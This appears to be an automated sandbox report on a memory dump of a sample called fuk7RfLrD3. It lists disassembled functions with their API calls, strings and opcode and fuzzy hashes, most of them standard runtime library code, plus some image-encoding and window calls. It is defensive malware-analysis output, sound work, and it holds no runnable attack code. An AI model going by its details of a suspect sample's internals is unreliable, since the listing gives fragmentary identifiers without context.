String ID: pScheduler$version
API String ID: 1687795959-3154422776
Opcode ID: 464dda17272c5f92190f115bd46177522cd506029ea0a62d1c7ec35c5c4aaa01
Instruction ID: 78896325b6b5d70010e1ee9e49f38da00e370817edf74f3b448257e365f7b275
Opcode Fuzzy Hash: 464dda17272c5f92190f115bd46177522cd506029ea0a62d1c7ec35c5c4aaa01
Instruction Fuzzy Hash: 99E08630900608F6CB14EE56D80EBDD77A45B51749F61C1277819610929BBC96C8CB4E

Function 00435888 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00435913
__alldvrm.LIBCMT ref: 00435B14
__alldvrm.LIBCMT ref: 00435B36

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
Instruction ID: bca4f3389f7aef3b321b47e138c454c1308b116cb1c02f017d73c82a305e3271
Opcode Fuzzy Hash: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
Instruction Fuzzy Hash: 65A14872A00B869FEB15DE18C8917AEFBE1EF19310F28426FD5859B381C23C9D41C759

Function 0043F9F8 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043FB27

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
Instruction ID: f2494f1ef04ef44517cd1171a85dede66e5513e309315ffa42068036143921cc
Opcode Fuzzy Hash: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
Instruction Fuzzy Hash: 57410771E00210ABDB257BBADC42AAF7664EF5E374F14127FF41882391D73C590946A9

Function 0040D3E1 Relevance: 6.1, APIs: 4, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0040D439
__Xtime_diff_to_millis2.LIBCPMT ref: 0040D453
_xtime_get.LIBCPMT ref: 0040D476
__Xtime_diff_to_millis2.LIBCPMT ref: 0040D482

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 9c244af1b80992c8c5c11ff33a9a240242c4a027173cbb81dbc6de2572cd5d43
Instruction ID: d103751f5e86bb577f21b0ef41fc0747bac1fbbf4bb65c452d8b20089be38efe
Opcode Fuzzy Hash: 9c244af1b80992c8c5c11ff33a9a240242c4a027173cbb81dbc6de2572cd5d43
Instruction Fuzzy Hash: A7217C75E0021A9FDF00EFA5CC829AEB7B8EF09714F10007AF901B7291D778AD058BA5

Function 004236DF Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,00000000), ref: 00423729
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423711

Part of subcall function 0041B71C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B73D

__CxxThrowException@8.LIBVCRUNTIME ref: 0042375A
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423783

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
String ID:
API String ID: 2630251706-0
Opcode ID: 0708c55e9bf2983c6b837536b85e823e81494798a28270a3cf60b9b0231776e7
Instruction ID: fbbc1a7e5a16338d661a11365c58371bffdd4c48ac4c368ddaba424d9e7313e5
Opcode Fuzzy Hash: 0708c55e9bf2983c6b837536b85e823e81494798a28270a3cf60b9b0231776e7
Instruction Fuzzy Hash: 5911E9747002146BCF04AF659C85DAEB765EB84761B144067FA059B392CBAC9D41C698

Function 00401F90 Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000005), ref: 00401FA5
UpdateWindow.USER32 ref: 00401FAD
ShowWindow.USER32(00000000), ref: 00401FC1
MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 00402024

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: Window$Show$MoveUpdate
String ID:
API String ID: 1339878773-0
Opcode ID: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
Instruction ID: 53ee9dd5e88c5c6849e3e7895ae91ae42f7fd804de43801a61d80981d891571f
Opcode Fuzzy Hash: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
Instruction Fuzzy Hash: 90016531E006109BC7258F19ED04A267BA7FFD5712B15803AF40C972B1D7B1AC428B9C

Function 004290B9 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 004290D3

Part of subcall function 00429020: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042904F
Part of subcall function 00429020: ___AdjustPointer.LIBCMT ref: 0042906A

_UnwindNestedFrames.LIBCMT ref: 004290E8
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 004290F9
CallCatchBlock.LIBVCRUNTIME ref: 00429121

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction ID: 9a28eba3c49a40873050ba514f30250a61a7a586528b59ff06f814ea835fedb3
Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction Fuzzy Hash: 55014032200159BBDF116E96EC41EEB7F7AEF48758F444009FE4896121C73AEC61DBA8

Function 00434F1F Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00434EC6,?,00000000,00000000,00000000,?,0043517E,00000006,FlsSetValue), ref: 00434F51
GetLastError.KERNEL32(?,00434EC6,?,00000000,00000000,00000000,?,0043517E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000,00000364,?,00431F9C), ref: 00434F5D
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00434EC6,?,00000000,00000000,00000000,?,0043517E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000), ref: 00434F6B

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction ID: 0dde809cff85efe1a06f082dffa05588a2f4c4b6f5b2494ffdd5bda6add1d188
Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction Fuzzy Hash: 3401FC36615322AFC7214F69AC449A77B98AF89FA1F241531F905D7240D724E90186E8

Function 0042611E Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426138
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042614C
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426164
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0042617C

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction ID: ba6f451568feed0ad97d4c35bc03da7052fef1102373e57c37541bd94dea7e10
Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction Fuzzy Hash: DD01F236700224A7CF16AE5AA811AFFB7A99F80354F41005BFC11A7282DE24FD2192A8

Function 00405915 Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0040591C

Part of subcall function 0040BB3D: __EH_prolog3_GS.LIBCMT ref: 0040BB44

std::_Locinfo::_Locinfo.LIBCPMT ref: 00405967
__Getcoll.LIBCPMT ref: 00405976
std::_Locinfo::~_Locinfo.LIBCPMT ref: 00405986

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID:
API String ID: 1836011271-0
Opcode ID: b945d4fba948faf335eba6a26c9d16208f5764ada45908dbcbdd3d34a3e84dcb
Instruction ID: 7de8e0425e838f52bf763386e227ca4e4c8dd97e461cbe55c35c0d0d082d521b
Opcode Fuzzy Hash: b945d4fba948faf335eba6a26c9d16208f5764ada45908dbcbdd3d34a3e84dcb
Instruction Fuzzy Hash: 61011771910209DFDB10EFA5C486B9DB7B0EF04329F10843EE459BB681DB789549CF99

Function 0041BEC7 Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BEF9
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF09
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF19
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF2D

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: Compare_exchange_acquire_4std::_
String ID:
API String ID: 3973403980-0
Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction ID: 54cf5004022dc03f320fac5c152f4f5b0e5638c7bf5de93af177e0e0418c077f
Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction Fuzzy Hash: 1901FB3744418DBBDF119E64DD428EE3B66EF08354B148516F918C4235C336CAB2EF89

Function 0040D215 Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON

Download Yara Rule

APIs

Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110CB

Part of subcall function 0041093D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041095F
Part of subcall function 0041093D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00410980

Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 004110DE
Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 004110EA
Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 004110F3

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
String ID:
API String ID: 4284812201-0
Opcode ID: 59b962ce0df35001d24a788376b82219d2b26174a8e6e3787add2960edfe3223
Instruction ID: f673f10ca75d55ca35707f3ec936348daa0dfd556a05ba3ac72040e7cf752ef9
Opcode Fuzzy Hash: 59b962ce0df35001d24a788376b82219d2b26174a8e6e3787add2960edfe3223
Instruction Fuzzy Hash: 2EF02470A002046BDF347BB648525EE35954F85318F04403FBA12AB7D1DEBC9DC6939D

Function 004134FC Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413515

Part of subcall function 0041289F: ___crtGetTimeFormatEx.LIBCMT ref: 004128B5
Part of subcall function 0041289F: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004128D4

GetLastError.KERNEL32 ref: 00413531
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413547
__CxxThrowException@8.LIBVCRUNTIME ref: 00413555

Part of subcall function 00412675: SetThreadPriority.KERNEL32(?,?), ref: 00412681

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
String ID:
API String ID: 1674182817-0
Opcode ID: 3fadc1366d0a75540ac8f783509af273c6311a84a5b4fac4ceb4b62defc82512
Instruction ID: 0599dc728a4d66ec5529e5430020c2b67b59d3184165c4d7970fdf63fa2ec416
Opcode Fuzzy Hash: 3fadc1366d0a75540ac8f783509af273c6311a84a5b4fac4ceb4b62defc82512
Instruction Fuzzy Hash: 6AF08271A002253AD724BA765D07FFB369C9B01B54F90095BB905E6186F9ECD99042AC

Function 004125E1 Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RegisterWaitForSingleObject.KERNEL32(?,00000000,00423582,000000A4,000000FF,0000000C), ref: 004125F8
GetLastError.KERNEL32(?,?,?,?,004185B9,?,?,?,?,00000000,?,00000000), ref: 00412607
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041261D
__CxxThrowException@8.LIBVCRUNTIME ref: 0041262B

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
String ID:
API String ID: 3803302727-0
Opcode ID: c7576253412bed51a53af5acb8f859d20b769276d3a1e4e3fae42923a132b8bd
Instruction ID: 32cc1d4aaffc7e2d0c3ec5972b7dcb87793a3d4e5e2b79d3cb8e63f4c665dc5c
Opcode Fuzzy Hash: c7576253412bed51a53af5acb8f859d20b769276d3a1e4e3fae42923a132b8bd
Instruction Fuzzy Hash: 2BF0A03460010ABBCF00EFA5DE45EEF37A86B00705F600616B611E20E1DBB8EA54976C

Function 00412306 Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtCreateEventExW.LIBCPMT ref: 0041231C
GetLastError.KERNEL32(?,?,?,?,?,00410B29), ref: 0041232A
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412340
__CxxThrowException@8.LIBVCRUNTIME ref: 0041234E

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
String ID:
API String ID: 200240550-0
Opcode ID: 66fd49b5c43f77bbcd2fa95a93d23545e34cca56ab3752b45afdfddad9ffa28e
Instruction ID: 1a74c5ccde1e3971b1c6c719148978c8dd05ce3529fe136f2ca3c66ce4c89eb0
Opcode Fuzzy Hash: 66fd49b5c43f77bbcd2fa95a93d23545e34cca56ab3752b45afdfddad9ffa28e
Instruction Fuzzy Hash: 1DE0D8716002193AE714BB764D07FBF369C6B00B45F94082ABE14E11C3FDACD55041AC

Function 004192B9 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004126E2: TlsAlloc.KERNEL32(?,00410B29), ref: 004126E8

TlsAlloc.KERNEL32(?,00410B29), ref: 0042396F
GetLastError.KERNEL32 ref: 00423981
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00423997
__CxxThrowException@8.LIBVCRUNTIME ref: 004239A5

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3735082963-0
Opcode ID: 4c0e1a6a312418bc90eef6f3fea79e88b9b6ce50c33034ee7117e387468c8eb0
Instruction ID: 15d2e13c7ff80a83f5b64d05c829fbc6b4bb44007b15bdef03250d0b5d6306aa
Opcode Fuzzy Hash: 4c0e1a6a312418bc90eef6f3fea79e88b9b6ce50c33034ee7117e387468c8eb0
Instruction Fuzzy Hash: 9BE02B749002146FC704BF76AC4A66E3374750134A7A00E3FB012D2192EEBCD1844A9C

Function 0041251D Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B29), ref: 00412527
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B29), ref: 00412536
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041254C
__CxxThrowException@8.LIBVCRUNTIME ref: 0041255A

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
String ID:
API String ID: 3016159387-0
Opcode ID: fca92cb7320ff50a6b90e81439df834d34dd5d4b89d2e23b0c713fa7ff00c28a
Instruction ID: 385e35fad119ba3144d3df74fa1b3009f218c6b200c547ffcefd8a897afd490a
Opcode Fuzzy Hash: fca92cb7320ff50a6b90e81439df834d34dd5d4b89d2e23b0c713fa7ff00c28a
Instruction Fuzzy Hash: 95E04874600119BBC714EFB5DF49AEF73BC7A01745BA0046AA501E2151EAACDA44877D

Function 00412675 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

SetThreadPriority.KERNEL32(?,?), ref: 00412681
GetLastError.KERNEL32 ref: 0041268D
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126A3
__CxxThrowException@8.LIBVCRUNTIME ref: 004126B1

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
String ID:
API String ID: 4286982218-0
Opcode ID: e898cf3acbe9b392c8e56d8d93d4defc04798ac26e6527183b72e34242952ab8
Instruction ID: c34ca93974de366a1d33064525cfd34c096e82c6d40c10065bdc34e64e282c71
Opcode Fuzzy Hash: e898cf3acbe9b392c8e56d8d93d4defc04798ac26e6527183b72e34242952ab8
Instruction Fuzzy Hash: 08E04F7460011A6BCB14BF619D06BAF37AC6A00745B50082AB515D10A2EEB9D56486AC

Function 0041273B Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE

Download Yara Rule

APIs

TlsSetValue.KERNEL32(?,00000000,00417961,00000000,?,?,00410B29,?,?,?,00000000,?,00000000), ref: 00412747
GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412753
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412769
__CxxThrowException@8.LIBVCRUNTIME ref: 00412777

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
String ID:
API String ID: 1964976909-0
Opcode ID: 5eb4a781f3e4b8ec8f5daef76b0371c62c85b840ada855eb018d32e5272f8a37
Instruction ID: adcf13394f918fecad39acecb2caa88bdbfd7867240310386255d15fa00e1845
Opcode Fuzzy Hash: 5eb4a781f3e4b8ec8f5daef76b0371c62c85b840ada855eb018d32e5272f8a37
Instruction Fuzzy Hash: ADE04F346001196BDB10BF619E09AAF77A86A00A45F50442AB515D10A2EEB9E564969C

Function 004126E2 Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,00410B29), ref: 004126E8
GetLastError.KERNEL32 ref: 004126F5
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041270B
__CxxThrowException@8.LIBVCRUNTIME ref: 00412719

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3103352999-0
Opcode ID: db4e8f81990c41efe0c5f892a1b43a96577a226854f9efbb8f129dbc0f0677bf
Instruction ID: 1ad0294434ecfca40659a618dd28aba5f9447f5ceacad7becc2ff902d53fffbc
Opcode Fuzzy Hash: db4e8f81990c41efe0c5f892a1b43a96577a226854f9efbb8f129dbc0f0677bf
Instruction Fuzzy Hash: 01E0CD3450011567C714BF759D09ABF72587901719BA00A1AF131D20D1EAACD458415C

Function 0042F06D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0042F0FD

Strings

pow, xrefs: 0042F0D5, 0042F0F2

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
Instruction ID: a192877c9f0054c0872b9fb76e5ad9458d959ccc769b6dca3ba9f50539c5e518
Opcode Fuzzy Hash: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
Instruction Fuzzy Hash: 8B515C61B0431296DB117B14E90137BBBB0AB54B00FE05D7FF491423A9EE3D8CA99A4F

Function 00432A75 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 156COMMONLIBRARYCODE

Download Yara Rule

Strings

s2C, xrefs: 00432A88
s2C, xrefs: 00432B05, 00432BFC

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID:
String ID: s2C$s2C
API String ID: 0-1833909196
Opcode ID: d26f55ed8b89044789a372bd2a44fa0211c5dd18a725056bdf55d7f93a069115
Instruction ID: de90a671c5843db736048dba6cdd1094f879e2809fe80a987d64bac264933c47
Opcode Fuzzy Hash: d26f55ed8b89044789a372bd2a44fa0211c5dd18a725056bdf55d7f93a069115
Instruction Fuzzy Hash: 0F51E731E04205EBCB20DF54C982B6EB770FF19314F24915BD5599B3D1E6B8E982CB89

Function 0043AE59 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0B4,?,00000050,?,?,?,?,?), ref: 0043AF34

Strings

OCP, xrefs: 0043AEAD
ACP, xrefs: 0043AE77

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction ID: e3ba11e5d781d2b130423e2bf0cbd093d466219ebf659edcdfcd25fe82a6d734
Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction Fuzzy Hash: E2214BA2AC0101A6DB30CB55C902B9B7356EF6CB24F569526EA89C7300F73EDD11C35E

Function 00401F00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F1B
GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F40

Strings

image/png, xrefs: 00401F4E

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: EncodersGdipImage$Size
String ID: image/png
API String ID: 864223233-2966254431
Opcode ID: bf724acd2d36aea3cd7c71ac0e6082fc752fbcd53218ac2ebd3932cd8158d6bf
Instruction ID: e538c811f89b171702b8ca366793f889c85100130971bf928fd16bdf8145c3c0
Opcode Fuzzy Hash: bf724acd2d36aea3cd7c71ac0e6082fc752fbcd53218ac2ebd3932cd8158d6bf
Instruction Fuzzy Hash: 5211737AD0410AFFCB119FA99C8149EBB7AFF45321B20027BEC10B32E0C7759E459A54

Function 0040EF1C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000000D,?,0040DE37,0040C64F,?,?,00000000,?,0040C51F,0045D5E4,0040C4EC,0045D5DC,?,ios_base::failbit set,0040C64F), ref: 0040EFA0

Strings

<(@, xrefs: 0040EF1F

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: ErrorLast
String ID: <(@
API String ID: 1452528299-4189137628
Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
Instruction ID: 966c5171ab2b841c9a1c941c3673e83940a55d69d5d5609413e6151fa891d796
Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
Instruction Fuzzy Hash: 9711C236200216BFCF129F61DC4496ABB65BB08715B11443AFA46E6290CB70DC219BD5

